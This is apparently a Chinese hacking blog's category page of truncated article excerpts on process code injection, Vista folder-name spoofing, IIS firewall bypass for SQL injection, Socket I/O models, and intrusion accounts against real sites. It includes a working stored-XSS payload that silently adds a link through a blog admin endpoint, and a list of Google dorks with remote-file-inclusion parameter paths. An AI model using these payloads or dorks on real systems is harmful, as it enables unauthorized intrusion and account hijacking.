分类 ‘技术文章’ 下的日志

向其他进程注入代码的三种方法

原版地址:http://www.codeproject.com/threads/winspy.asp?df=100&forumid=16291&select=1025152&msg=1025152

pdf格式下载:
http://netxfly.blogbus.com/files/1163491746.pdf

下载整个压缩包

下载WinSpy

作者:Robert Kuster

翻译:袁晓辉([email protected]

摘要:如何向其他线程的地址空间中注入代码并在这个线程的上下文中执行之。

目录:

●导言

●Windows 钩子(Hooks)

●CreateRemoteThread 和LoadLibrary 技术

○进程间通讯

●CreateRemoteThread 和 WriteProcessmemory 技术
阅读全文 »

XSS 0DAY

文章作者:茄子宝
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)

看到梦之光芒放出来了!我也不藏了!

10月7日的时候我就发的日志,提示了大家!这里算是上次发的XSS WORM初尝试的续吧.

其实很简单,就是两次转码.

<DIV STYLE="background-image: url(javascript:var XmlHttp=new ActiveXObject("Microsoft.XMLhttp"); XmlHttp.Open("get","/manage/link.do?m=add&title=S0n9%20bl09&desc=This%20is%20XSS%20TEST%20%21&link=http%3A//s0n9.blog.sohu.com&_",true); XmlHttp.send(null);)">

阅读全文 »

Tags:

Vista下的文件名欺骗

鬼仔:我没有测试。。主要是没有环境,我机器跑不起来Vista

作者:est
来源:est's Blog

打开一个文件夹比如说,E:\test ,空白处点右键,选择 属性,选择自定义,然后可以给文件夹改个图标,这个可能地球人都知道了,不过Vista下有更好玩的东西,先随便给文件夹改个图标,点击确定,然后,打开当前文件夹下的 desktop.ini(方法就很多了,最简单:直接在地址栏的当前路径后面接着输入 \desktop.ini 回车,当然,如果你启用了“显示系统及隐藏文件”的话,直接双击打开),记事本弹出来,加这么一句:

LocalizedResourceName=Hacked By est

保存,关闭记事本。

把 desktop.ini 改名成其他,例如 desktop.ini2 阅读全文 »

Tags:

Remote File Inclusion list [ with d0rkz ]

来源:x140yu

1. allinurl:my_egallery site:.org
/modules/My_eGallery/public/displayCategory.php?basepath=

2. allinurl:xgallery site:.org
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=

3. allinurl:coppermine site:.org
/modules/coppermine/themes/default/theme.php?THEME_DIR=

4. allinurl:4nAlbum site:.org
/modules/4nAlbum/public/displayCategory.php?basepath=
阅读全文 »

Tags:

很幽默的讲解六种Socket I/O模型

来源:s0n9 '5 b109

本文简单介绍了当前Windows支持的各种Socket I/O模型,如果你发现其中存在什么错误请务必赐教。

一:select模型
二:WSAAsyncSelect模型
三:WSAEventSelect模型
四:Overlapped I/O 事件通知模型
五:Overlapped I/O 完成例程模型
六:IOCP模型

老陈有一个在外地工作的女儿,不能经常回来,老陈和她通过信件联系。他们的信会被邮递员投递到他们的信箱里。
这和Socket模型非常类似。下面我就以老陈接收信件为例讲解Socket I/O模型~~~

一:select模型

老陈非常想看到女儿的信。以至于他每隔10分钟就下楼检查信箱,看是否有女儿的信~~~~~
在这种情况下,"下楼检查信箱"然后回到楼上耽误了老陈太多的时间,以至于老陈无法做其他工作。
阅读全文 »

突破一流信息监控系统等IIS防火墙实现注入

文章作者:langouster
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)

先来说URL编码,%加两位的16进制表示一个字符,比如’经过编码之后就是%27,这是人人都知道的URL编码规则,UrlUnescapeInPlace之类的API函数甚至于程序员自己写的URL译码函数都是基于这一思想。

然而,我们何必如此听话,试想一下要是%后跟的不是16进制数字而是像abc%hh会发生什么事呢。先看UrlUnescapeInPlace,
写个小程序试一下,abc%hh经过译码还是abc%hh;再看asp.dll是怎么译码的,在asp页面中写入 response.Write(request.QueryString("str")),然后用?str=abc%hh访问它,页面显示abchh,它直接把%给去掉了。
阅读全文 »

Tags: , ,

再现社会工程学

文章作者:凋凌玫瑰[N.C.P.H]
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)

这是我渗透过程中的一次真实经历,我也没有想到在经过两天的时间拿到主站服务器时,主站程序却放在主站服务器的虚拟机上,跑的是一个linux系统,进入需要root用户名和密码,但那个root用户名和密码却没有找到,那怎么办呢?

是一个排名很高的台湾站点,有很多分站,我一个一个的分站查询,在一个分站上扫描网页目录和文件夹的时候得到一个admin.txt文档,里面记录了分站的分布对应的内网ip.有了分站的详细情况就不用那么麻烦去google上翻了.信息收集是渗透过程中一个很重要的环节.在一个stor.xxx.com.tw分站上,注册了一个用户,在用户里面有一个搜索框,输入ddd'暴错,打开 阅读全文 »

Tags:

遭遇数据库分离

软件作者:凋凌玫瑰[N.C.P.H]
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)

此文已发表在<黑客防线>第十二期,另外还有两篇渗透我们学院的就不发了.目前很多朋友在渗透的过程中遇到数据库分离的情况,因此发出来分享一下,写得很基础,高手略过.

前言:在我们入侵的过程中,很多人会遇到这种情况,拿到一个sa权限或是db_owner权限的注入点,但是数据库和web数据是两台分离的服务器,也就是没有在同一台服务器上。有些是sa权限的注入点,我们当然可以直接执行命令,开了3389,但这时候有人直接用网址的ip去连接,怎么连接不上呢?明明用户是建好了的。有的遇到一个db_owner权限的注入点,想通过差异备份得webshell,可找了半天找不到目录,这是为什么呢?
阅读全文 »

Tags: